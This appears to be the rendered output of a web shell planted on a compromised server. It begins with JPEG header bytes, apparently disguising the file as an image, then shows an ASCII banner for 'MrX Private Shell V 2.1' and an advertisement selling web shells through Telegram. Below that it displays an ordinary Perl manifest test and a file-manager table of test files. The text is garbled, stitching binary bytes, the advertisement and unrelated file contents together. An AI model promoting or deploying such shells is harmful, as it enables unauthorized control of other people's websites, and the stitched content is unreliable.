����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!perl
use Test::More;
if (!-d ".git" or $^O != /^(linux|.*bsd|darwin|solaris|sunos)$/) {
plan skip_all => "requires a git checkout and a unix for git and diff";
}
plan tests => 1;
system("git ls-tree -r --name-only HEAD | grep -E -v '(.github/workflows/testsuite.yml)' >MANIFEST.git");
if (-e "MANIFEST.git") {
diag "MANIFEST.git created with git ls-tree";
is(`diff -bu MANIFEST.git MANIFEST`, "", "MANIFEST.git compared to MANIFEST")
and unlink "MANIFEST.git";
} else {
ok(1, "skip no git");
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 0-basic.t | File | 453 B | 0644 |
|
| manifest.t | File | 509 B | 0644 |
|
| pod-coverage.t | File | 680 B | 0644 |
|
| pod.t | File | 350 B | 0644 |
|